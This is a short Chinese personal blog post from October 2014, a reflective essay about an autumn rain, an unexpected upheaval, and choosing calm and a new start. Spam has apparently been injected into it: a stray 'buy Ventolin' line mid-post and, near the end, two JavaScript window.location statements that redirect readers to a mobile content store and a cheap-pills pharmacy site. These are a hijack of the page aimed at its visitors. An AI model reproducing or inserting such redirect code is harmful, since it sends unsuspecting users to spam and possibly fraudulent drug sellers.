秋安

Oct 31st, 2014

一场秋雨之后,飘零的落叶在泥泞之中显得分外凄凉。看来,秋天惹人愁思的确是其来有自。外出归来,在朋友的工作坊吃素餐,感受到平静与安宁。

没有想到会有一场风波提前到来。我知道这是我的弱点所致。但它所导致的后果并不是我的初衷。但世间事往往就是这样,会在你意想不到的地方突然转向,打击也总是来的措手不及。在这件事情上,没有一个人能收获快乐。愤怒不会导致你要的结果,反而会伤及自身。我为自己的平静而欣慰。

buy Ventolin

也好,当一些事情暴露在大家眼前,反而会使你放下从前的犹疑。你越是想要平静安稳的生活,可能越要经受疾风暴雨的洗礼。那就这样吧,让我放弃旧有的思路,再尝试一次未知的生活。

秋安。

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2″; window.location = “http://cheap-pills-norx.com/search.htm?route=search&q=”;

标签:
本文的评论功能被关闭了.